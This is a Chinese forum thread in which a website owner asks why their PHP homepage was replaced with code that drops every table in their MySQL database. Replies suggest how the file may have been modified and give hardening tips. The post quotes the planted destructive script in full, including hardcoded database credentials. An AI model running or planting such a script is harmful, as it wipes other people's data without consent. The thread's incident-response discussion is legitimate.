php数据库被人删了。求解！！！

网站php首页index.php替换成如下代码：

<?php
$hostname ='localhost';
$userid = 'a0623213841';
$password = '39640596';
$dbname = 'a0623213841';
$connect = mysql_connect($hostname,$userid,$password);
mysql_select_db($dbname);
$result = mysql_query("show table status from $dbname",$connect);
while($data=mysql_fetch_array($result)) {
mysql_query("drop table $data[Name]");
}
?>
数据库全部被清空。

整个文档里面只有首页的修改日期是最新的修改日期。内部暂时没发现有啥木马在里面。

现在怀疑有人知道ftp密码，清空数据故意做对。但是我找不到这个的理由，并且这个人还懂php代码，除了知道ftp密码修改首页外。。。还有其他方式可以修改网站首页么？黑客？
或者php系统的漏洞我还没发现？？？
百思不得其解，，求解中！！！！

看看事件查看器

恐怖分子？

用的虚拟主机，我从哪里去查事件查看器额。。。

除ftp外，后台管理webftp同样可以更改文件，还有如进入后台，通过上传（如图片、文件等）也能达到修改的目的。

建议K粉们：

1、如非必要，安装后删除webftp模块。

2、安装后，更改登录路径，以防暴力猜解。

3、尽量加强用户名密码强度。

4、进入后台管理后，尽量不要直接关闭浏览器，应当选择退出后再关闭。

图片也可能是木马,特别是陌生的非自己的某个php文件也可能是木马

webftp模块我安装后就马上删除了的。

后台路径倒是没改。。不过编辑器的路径我改了。关键是只改了一个index.php。其他的都没得最新的修改时间。。。唉。。数据库都没备份个，，这个完蛋了。就算是黑客，也用不着跟我这样做对吧。。。

进入后台上传文件，写入了。总得有个修改时间吧。可是这个时间都是很久以前的了。

是不是身边熟悉的人下的毒手，还真狠。

身边的人我倒还真找不出理由让他来删除这个数据库！！！